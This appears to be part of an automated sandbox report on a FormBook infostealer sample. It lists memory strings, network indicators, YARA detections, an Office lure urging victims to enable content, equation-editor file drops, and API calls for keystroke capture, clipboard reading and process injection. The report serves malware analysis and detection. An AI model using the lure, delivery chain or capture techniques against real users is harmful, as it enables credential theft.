Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000008.00000000.2181773215.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000008.00000000.2181625613.00000000039F4000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000008.00000000.2196077802.000000000B320000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleaner
Source: explorer.exe, 00000008.00000000.2191369780.000000000856E000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000008.00000000.2191235298.0000000008471000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerp
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2181773215.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://z.about.com/m/a08.ico
Source: vbc.exe, 00000004.00000002.2182149454.0000000002834000.00000004.00000001.sdmp, acqyswhf.exe, 00000005.00000002.2176773988.0000000003B03000.00000004.00000001.sdmp String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: acqyswhf.exe, 00000005.00000002.2176773988.0000000003B03000.00000004.00000001.sdmp String found in binary or memory: https://www.globalsign.com/repository/0
Source: vbc.exe, 00000004.00000002.2182149454.0000000002834000.00000004.00000001.sdmp, acqyswhf.exe, 00000005.00000002.2176773988.0000000003B03000.00000004.00000001.sdmp String found in binary or memory: https://www.globalsign.com/repository/06
Source: unknown Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.22:49165 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality for read data from the clipboard
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040548D GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard, 4_2_0040548D
Contains functionality to read the clipboard data
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00C44632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 5_2_00C44632
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00C30508 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, 5_2_00C30508

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 00000006.00000002.2204900441.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2204979251.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2169563317.0000000000220000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2380114742.00000000000B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2204962869.00000000003C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2380245950.0000000000210000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000001.2167976340.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 5.2.acqyswhf.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.acqyswhf.exe.220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.1.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.1.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000006.00000002.2204900441.00000000001F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2204900441.00000000001F0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2204979251.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2204979251.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.2169563317.0000000000220000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.2169563317.0000000000220000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.2380114742.00000000000B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.2380114742.00000000000B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.2204962869.00000000003C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.2204962869.00000000003C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.2380245950.0000000000210000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.2380245950.0000000000210000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000001.2167976340.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000001.2167976340.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.acqyswhf.exe.220000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.acqyswhf.exe.220000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.acqyswhf.exe.220000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.acqyswhf.exe.220000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.1.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.1.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.1.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.1.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 6.2.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.2.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable Editing from the 19 h . yellow bar above ,0 This document is 3. Once you have enabled ed
Source: Screenshot number: 4 Screenshot OCR: Enable Content from the yellow bar above 22 23 24 25 26 27 28 0 29 . 30 31 32 33 34 3
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\scancopy87867678[1].exe Jump to dropped file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_004181D0 NtCreateFile, 6_2_004181D0
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00418280 NtReadFile, 6_2_00418280
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00418300 NtClose, 6_2_00418300
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_004183B0 NtAllocateVirtualMemory, 6_2_004183B0
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_004182FA NtClose, 6_2_004182FA
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00418284 NtReadFile, 6_2_00418284
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_004183AB NtAllocateVirtualMemory, 6_2_004183AB
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BE00C4 NtCreateFile,LdrInitializeThunk, 6_2_00BE00C4
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BE0078 NtResumeThread,LdrInitializeThunk, 6_2_00BE0078
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BE0048 NtProtectVirtualMemory,LdrInitializeThunk, 6_2_00BE0048
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BE07AC NtCreateMutant,LdrInitializeThunk, 6_2_00BE07AC
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BDF9F0 NtClose,LdrInitializeThunk, 6_2_00BDF9F0
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BDF900 NtReadFile,LdrInitializeThunk, 6_2_00BDF900
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BDFAE8 NtQueryInformationProcess,LdrInitializeThunk, 6_2_00BDFAE8
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BDFAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 6_2_00BDFAD0
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BDFBB8 NtQueryInformationToken,LdrInitializeThunk, 6_2_00BDFBB8
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BDFB68 NtFreeVirtualMemory,LdrInitializeThunk, 6_2_00BDFB68
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BDFC90 NtUnmapViewOfSection,LdrInitializeThunk, 6_2_00BDFC90
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BDFC60 NtMapViewOfSection,LdrInitializeThunk, 6_2_00BDFC60
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BDFD8C NtDelayExecution,LdrInitializeThunk, 6_2_00BDFD8C
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BDFDC0 NtQuerySystemInformation,LdrInitializeThunk, 6_2_00BDFDC0
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BDFEA0 NtReadVirtualMemory,LdrInitializeThunk, 6_2_00BDFEA0
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BDFED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 6_2_00BDFED0
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BDFFB4 NtCreateSection,LdrInitializeThunk, 6_2_00BDFFB4
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BE10D0 NtOpenProcessToken, 6_2_00BE10D0
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BE0060 NtQuerySection, 6_2_00BE0060
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BE01D4 NtSetValueKey, 6_2_00BE01D4
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BE010C NtOpenDirectoryObject, 6_2_00BE010C
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BE1148 NtOpenThread, 6_2_00BE1148
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BDF8CC NtWaitForSingleObject, 6_2_00BDF8CC
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BDF938 NtWriteFile, 6_2_00BDF938
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BE1930 NtSetContextThread, 6_2_00BE1930
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BDFAB8 NtQueryValueKey, 6_2_00BDFAB8
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BDFA20 NtQueryInformationFile, 6_2_00BDFA20
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BDFA50 NtEnumerateValueKey, 6_2_00BDFA50
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BDFBE8 NtQueryVirtualMemory, 6_2_00BDFBE8
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BDFB50 NtCreateKey, 6_2_00BDFB50
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BDFC30 NtOpenProcess, 6_2_00BDFC30
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BDFC48 NtSetInformationFile, 6_2_00BDFC48
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BE0C40 NtGetContextThread, 6_2_00BE0C40
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BE1D80 NtSuspendThread, 6_2_00BE1D80
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BDFD5C NtEnumerateKey, 6_2_00BDFD5C
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BDFE24 NtWriteVirtualMemory, 6_2_00BDFE24
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BDFFFC NtCreateProcessEx, 6_2_00BDFFFC
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_2_00BDFF34 NtQueueApcThread, 6_2_00BDFF34
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_004181D0 NtCreateFile, 6_1_004181D0
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_00418280 NtReadFile, 6_1_00418280
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_00418300 NtClose, 6_1_00418300
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_004183B0 NtAllocateVirtualMemory, 6_1_004183B0
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_004182FA NtClose, 6_1_004182FA
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_00418284 NtReadFile, 6_1_00418284
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 6_1_004183AB NtAllocateVirtualMemory, 6_1_004183AB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_008500C4 NtCreateFile,LdrInitializeThunk, 10_2_008500C4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_008507AC NtCreateMutant,LdrInitializeThunk, 10_2_008507AC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0084F9F0 NtClose,LdrInitializeThunk, 10_2_0084F9F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0084F900 NtReadFile,LdrInitializeThunk, 10_2_0084F900
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0084FAB8 NtQueryValueKey,LdrInitializeThunk, 10_2_0084FAB8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0084FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 10_2_0084FAD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0084FAE8 NtQueryInformationProcess,LdrInitializeThunk, 10_2_0084FAE8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0084FBB8 NtQueryInformationToken,LdrInitializeThunk, 10_2_0084FBB8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 10_2_0084FB50 NtCreateKey,LdrInitializeThunk, 10_2_0084FB50
